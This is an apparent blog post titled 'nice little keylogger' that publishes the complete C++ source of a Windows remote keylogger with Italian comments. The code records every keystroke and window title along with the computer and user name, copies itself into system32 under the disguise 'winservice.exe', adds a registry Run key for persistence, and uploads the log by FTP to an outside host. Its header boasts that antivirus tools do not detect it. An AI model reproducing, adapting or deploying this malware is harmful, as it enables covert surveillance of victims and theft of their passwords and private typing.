Wednesday, September 9, 2009

nice little keylogger

Posted by Anonymous on Thu 10 Sep 01:30
  1. /*
  2. *************************************************************************
  3. *  __GiReX__ Remote KeyLogger 2.0     MODIFICATO BY cr4sh_0v3rr1d3      *
  4. *    Linguaggio: C++                                                    *
  5. *    Features: Keylogger Remoto                                         *
  6. *   - Logga tutto, e la maggior parte delle combinazioni da tastiera    *
  7. *   - Con un apposita aggiunta alle chiavi di reg. si autoavvia con Win *
  8. *   - INVIO LOG TRAMITE FTP                        *
  9. *   - Se fallisce, ritenta ogni 60 MINUTI di rinviare il log            *
  10. *   - Una volta inviato il vecchio log viene cancellato dal PC vittima  *
  11. *   - Non rilevato dagli AntiVirus                                      *
  12. *************************************************************************
  13. */
  14.  
  15. #include <windows.h>
  16. #include <iostream>
  17. #include <cstring>
  18. #include <ctime>
  19. #include <fstream>
  20. #include <stdio.h>
  21. #include <time.h>
  22. #include <curl/curl.h>
  23. #include <sys/types.h>
  24. #include <sys/stat.h>
  25. #include <string.h>
  26.  
#define PRESSED -32767   // GetAsyncKeyState() result the polling loop compares against: 0x8001 read as a signed 16-bit value (key currently down and pressed since the previous call)
#define LOCAL_FILE      "c:\\windows\\system32\\log.txt"   // Hard-coded local path that upload() stat()s and reads
#define UPLOAD_FILE_AS  "log.txt"   // Remote file name used for the upload and for the RNFR command
#define REMOTE_URL      "ftp://jumpers.netsons.org/"  UPLOAD_FILE_AS   // FTP exfiltration target (network indicator: plain FTP, no credentials in the URL)
#define RENAME_FILE_TO  "renamed-and-fine.txt"   // Remote name applied by the RNTO command after the transfer

using namespace std;

// Forward declarations; the definitions follow main().
void nascondi();
void StartLog();
bool upload();
void chkSend();
void RegistraAndSposta();
void logga(char *stringa);
void logga(char carattere); // OVERLOAD
ofstream log; // Log file stream; logga() reopens it in append mode for every single write
char prog[25] = "winservice.exe"; // Expected file name of the running executable (source of the CopyFile() in RegistraAndSposta())
char key_dir[255], log_dir[255]; // key_dir: system directory from GetSystemDirectory(); log_dir: key_dir + "\\log.txt", built in main()
bool inviato = FALSE; // Set to upload()'s result; chkSend() keeps retrying the upload while this is FALSE
  46.  
// libcurl CURLOPT_READFUNCTION callback (taken from libcurl's ftpupload example):
// reads up to size*nmemb bytes from the FILE* passed as `stream` into `ptr`
// and returns the number of items fread() delivered. Every call also prints
// the byte count to stderr.
static size_t read_callback(void *ptr, size_t size, size_t nmemb, void *stream)
{
  /* in real-world cases, this would probably get this data differently
     as this fread() stuff is exactly what the library already would do
     by default internally */
  size_t retcode = fread(ptr, size, nmemb, stream);

  fprintf(stderr, "*** We read %d bytes from file\n", retcode);
  return retcode;
}
  57.  
// Entry point. Installs persistence via RegistraAndSposta(), derives log_dir from
// key_dir, writes the session header (StartLog()), attempts one upload, then polls
// forever: each iteration records a foreground-window title change, samples
// GetAsyncKeyState() for the keys of interest (SHIFT state selects the upper- or
// lower-case branch), sleeps 10 ms and calls chkSend(). No keyboard hook is
// installed; capture is purely polling-based. argc/argv are unused and the
// while(1) loop has no exit, so `return 0` is never reached.
int main(int argc, char *argv[])
{
    int i = 0;
    HWND finestra;
    char titolo_finestra[255], last_titolo[255];
     RegistraAndSposta();
      strcpy(log_dir, key_dir);
       strcat(log_dir, "\\log.txt");

     //nascondi();
     StartLog();
     inviato = upload();

      while(1) {
      finestra = GetForegroundWindow();  // Handle of the window that currently has focus
        GetWindowText(finestra, titolo_finestra, sizeof(titolo_finestra));
         if(strcmp(titolo_finestra, last_titolo) && titolo_finestra[0]!= '\0')
          {
             logga("\n\n==\tFinestra:  ");  // Title banner written whenever the foreground window changes
             logga(titolo_finestra);
             logga("\t==\n\n");
          }  strcpy(last_titolo, titolo_finestra);
    if(GetAsyncKeyState(VK_SHIFT)) { // SHIFT held: log upper-case letters and shifted symbols
      for(i = 65; i<= 90; i++) {
        if(GetAsyncKeyState(i)== PRESSED) logga(i);  // 'A'..'Z'; the int argument resolves to the logga(char) overload
        }
          for(i = 48; i <= 57; i++) {// SHIFTED DIGIT ROW --> =!"�$%&/() <-- (apparently an Italian layout; 163 presumably '£' in the author's code page)
            if(GetAsyncKeyState(i) == PRESSED) {
              if(i==48) logga(61);
                else if(i==51) logga(163);
                 else if(i==55) logga(47);
                  else logga(i-16);
            }
        }
         /* 186..226 are OEM virtual-key codes (VK_OEM_*); the mapping below is layout-specific */
         if(GetAsyncKeyState(220) == PRESSED) logga('|');
         if(GetAsyncKeyState(188) == PRESSED) logga(';');
         if(GetAsyncKeyState(190) == PRESSED) logga(':');
         if(GetAsyncKeyState(189) == PRESSED) logga('_');
         if(GetAsyncKeyState(186) == PRESSED) logga('�');
         if(GetAsyncKeyState(187) == PRESSED) logga('*');
         if(GetAsyncKeyState(192) == PRESSED) logga('�');
         if(GetAsyncKeyState(222) == PRESSED) logga('�');
         if(GetAsyncKeyState(191) == PRESSED) logga('�');
         if(GetAsyncKeyState(219) == PRESSED) logga('?');
         if(GetAsyncKeyState(221) == PRESSED) logga('^');
         if(GetAsyncKeyState(226) == PRESSED) logga('>');
    }  // END IF (SHIFT held)

          else {  //  SHIFT not held: log lower-case letters, digits and unshifted symbols
            for (i = 65; i <= 90; i++) {
              if (GetAsyncKeyState(i)  == PRESSED) logga(i+32);  // LETTERS: +32 converts 'A'..'Z' to 'a'..'z'
          }

            for(i = 48; i <= 57; i++) {   //  DIGITS
              if(GetAsyncKeyState(i) == PRESSED) logga(i);
          }
        /*           SOME SPECIAL CHARACTERS (VK_OEM_* codes, layout-specific; 106..111 are the numeric-keypad operators)          */
            if(GetAsyncKeyState(220) == PRESSED) logga('\\');
            if(GetAsyncKeyState(188) == PRESSED) logga(',');
            if(GetAsyncKeyState(190) == PRESSED) logga('.');
            if(GetAsyncKeyState(189) == PRESSED) logga('-');
            if(GetAsyncKeyState(186) == PRESSED) logga('�');
            if(GetAsyncKeyState(187) == PRESSED) logga('+');
            if(GetAsyncKeyState(192) == PRESSED) logga('�');
            if(GetAsyncKeyState(222) == PRESSED) logga('�');
            if(GetAsyncKeyState(191) == PRESSED) logga('�');
            if(GetAsyncKeyState(219) == PRESSED) logga('\'');
            if(GetAsyncKeyState(221) == PRESSED) logga('�');
            if(GetAsyncKeyState(226) == PRESSED) logga('<');
            if(GetAsyncKeyState(111) == PRESSED) logga('/');
            if(GetAsyncKeyState(106) == PRESSED) logga('*');
            if(GetAsyncKeyState(109) == PRESSED) logga('-');
            if(GetAsyncKeyState(107) == PRESSED) logga('+');
            if(GetAsyncKeyState(110) == PRESSED) logga('.');
        /*           FUNCTION KEYS (logged as char* tags)        */
            if(GetAsyncKeyState(VK_CAPITAL) == PRESSED) logga("<CPSLCK>");
            if(GetAsyncKeyState(VK_BACK) == PRESSED) logga("<BK>");
            if(GetAsyncKeyState(VK_DELETE) == PRESSED) logga("<DEL>");
            if(GetAsyncKeyState(VK_ESCAPE) == PRESSED) logga("<ESC>");
            if(GetAsyncKeyState(VK_HOME) == PRESSED) logga("<HOME>");
            if(GetAsyncKeyState(VK_END) == PRESSED) logga("<END>");
            if(GetAsyncKeyState(VK_INSERT) == PRESSED) logga("<INS>");
            if(GetAsyncKeyState(VK_TAB) == PRESSED) logga("<TAB>");
            if(GetAsyncKeyState(VK_LEFT) == PRESSED) logga("<LEFT>");
            if(GetAsyncKeyState(VK_RIGHT) == PRESSED) logga("<RIGHT>");
            if(GetAsyncKeyState(VK_UP) == PRESSED) logga("<UP>");
            if(GetAsyncKeyState(VK_DOWN) == PRESSED) logga("<DOWN>");
        /*           SPACE AND NEWLINE           */
            if(GetAsyncKeyState(VK_SPACE) == PRESSED) logga(" ");
            if(GetAsyncKeyState(VK_RETURN) == PRESSED) logga("\t<INVIO>\n");
        }
       Sleep(10);  // Polling interval, 10 ms
       chkSend();       // Retry the upload if it has not succeeded yet
      }

  return 0;
}
  155.  
// Writes the session header to the log: a start banner, the computer name
// (GetComputerName), the user name (GetUserName) and the start time as
// formatted by ctime(). Everything goes through logga(), i.e. to log_dir.
void StartLog()
{
  char user[50], pcname[50], ora[50];
  DWORD buffSize = 50;
   GetComputerName(pcname, &buffSize);  // Computer name
   GetUserName(user,&buffSize);  // Logged-in user name

  time_t startTime;
   time(&startTime);  // Current time
    strcpy(ora, ctime(&startTime));  // As text (ctime() output ends with a newline)

    logga("\t--> KEYLOGGER AVVIATO <--\n\n"); // Header lines (Italian strings are part of the log format and are left as-is)
     logga("Nome del computer:\t");
      logga(pcname);
     logga("\nUsername:\t\t");
      logga(user);
     logga("\nStartup Time:\t\t");
      logga(ora);
       logga("\n\n");
}
  176.  
// Install and persist: fills key_dir with the system directory, copies the file
// named by `prog` from the current working directory into that directory, and
// registers the copied path as a REG_SZ value named "winservice.exe" under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run (requires write access to
// HKLM). Return values of CopyFile and the registry calls are not inspected.
// For defenders the Run value name and the copied file in the system directory
// are the host indicators of this sample.
void RegistraAndSposta()
{
char moved[255];
  GetSystemDirectory(key_dir, sizeof(key_dir));  // Path of the system32 directory
   strcpy(moved, key_dir);
   strcat(moved, "\\");
   strcat(moved, prog);
    CopyFile(prog, moved, 1);  // Copy the executable into system32 (third argument: fail if the target already exists)

  HKEY chiave;  // Run key: makes the copied executable start with Windows
   RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&chiave);
    RegSetValueEx(chiave, "winservice.exe",0,REG_SZ,(const unsigned char*)moved,sizeof(moved));                //<<<----------- the value name here must match the file name
  RegCloseKey(chiave);
}
  191.  
// Hides the console window by looking up the "ConsoleWindowClass" window and
// calling ShowWindow(SW_HIDE) on it. The call site in main() is commented out,
// so in this version the console stays visible.
void nascondi()
{
  HWND invisibile;
    invisibile = FindWindow("ConsoleWindowClass", NULL); // Console window handle
     ShowWindow(invisibile, SW_HIDE);     //     Hide it
}
  198.  
// Appends a single character to the log file at log_dir. The global stream is
// opened in append mode and closed again on every call, so each keystroke is
// one open/write/close cycle on disk.
void logga(char carattere) // Log a character
{
    log.open(log_dir, ios::app);
      log << carattere;
    log.close();
}
  205.  
// Appends a NUL-terminated string to the log file at log_dir, using the same
// open-in-append-mode / close-per-call pattern as the char overload.
void logga(char *stringa) // Log a string (char*)
{
     log.open(log_dir, ios::app);
      log << stringa;
     log.close();
}
  212.  
// Uploads LOCAL_FILE to REMOTE_URL over FTP with libcurl (structure follows
// libcurl's ftpupload example), then issues RNFR/RNTO via CURLOPT_POSTQUOTE to
// rename the remote file to RENAME_FILE_TO. Returns false only when stat() on
// LOCAL_FILE fails; in every other case it returns true after the attempt,
// whatever curl_easy_perform() reported (`res` is assigned but never inspected).
// Progress and sizes are printed to stdout/stderr.
bool upload() {
  CURL *curl;
  CURLcode res;
  FILE *hd_src;
  struct stat file_info;
  curl_off_t fsize;

  struct curl_slist *headerlist=NULL;
  static const char buf_1 [] = "RNFR " UPLOAD_FILE_AS;   // post-transfer FTP command: rename from
  static const char buf_2 [] = "RNTO " RENAME_FILE_TO;   // post-transfer FTP command: rename to

  /* get the file size of the local file */
  if(stat(LOCAL_FILE, &file_info)) {
    printf("Couldnt open '%s': %s\n", LOCAL_FILE, strerror(errno));
    return false;
  }
  fsize = (curl_off_t)file_info.st_size;

  printf("Local file size: %" CURL_FORMAT_CURL_OFF_T " bytes.\n", fsize);

  /* get a FILE * of the same file */
  hd_src = fopen(LOCAL_FILE, "rb");

  /* In windows, this will init the winsock stuff */
  curl_global_init(CURL_GLOBAL_ALL);

  /* get a curl handle */
  curl = curl_easy_init();
  if(curl) {
    /* build a list of commands to pass to libcurl */
    headerlist = curl_slist_append(headerlist, buf_1);
    headerlist = curl_slist_append(headerlist, buf_2);

    /* we want to use our own read function */
    curl_easy_setopt(curl, CURLOPT_READFUNCTION, read_callback);

    /* enable uploading */
    curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);

    /* specify target */
    curl_easy_setopt(curl,CURLOPT_URL, REMOTE_URL);

    /* pass in that last of FTP commands to run after the transfer */
    curl_easy_setopt(curl, CURLOPT_POSTQUOTE, headerlist);

    /* now specify which file to upload */
    curl_easy_setopt(curl, CURLOPT_READDATA, hd_src);

    /* Set the size of the file to upload (optional).  If you give a *_LARGE
       option you MUST make sure that the type of the passed-in argument is a
       curl_off_t. If you use CURLOPT_INFILESIZE (without _LARGE) you must
       make sure that to pass in a type 'long' argument. */
    curl_easy_setopt(curl, CURLOPT_INFILESIZE_LARGE,
                     (curl_off_t)fsize);

    /* Now run off and do what you've been told! */
    res = curl_easy_perform(curl);

    /* clean up the FTP commands list */
    curl_slist_free_all (headerlist);

    /* always cleanup */
    curl_easy_cleanup(curl);
  }
  fclose(hd_src); /* close the local file */

  curl_global_cleanup();
  return true;   /* reached regardless of the transfer outcome */

}
  283.  
  284.  
// Retry helper called on every iteration of the main loop. Does nothing once
// `inviato` is TRUE; otherwise reads the local wall-clock minute and calls
// upload() whenever it is 0, i.e. during the first minute of each hour
// (with the 10 ms loop period this means repeated attempts within that minute
// until upload() returns true).
void chkSend()
{
  if(inviato==TRUE) return;
  else {

   struct tm *orario;
   time_t lt;
   int min;

   lt = time(NULL);
    orario = localtime(&lt);
      min = orario->tm_min;  // minute of the hour, 0..59
       if(min==0) inviato = upload();
    }
}

The paste: http://pastebin.com/m560a9f66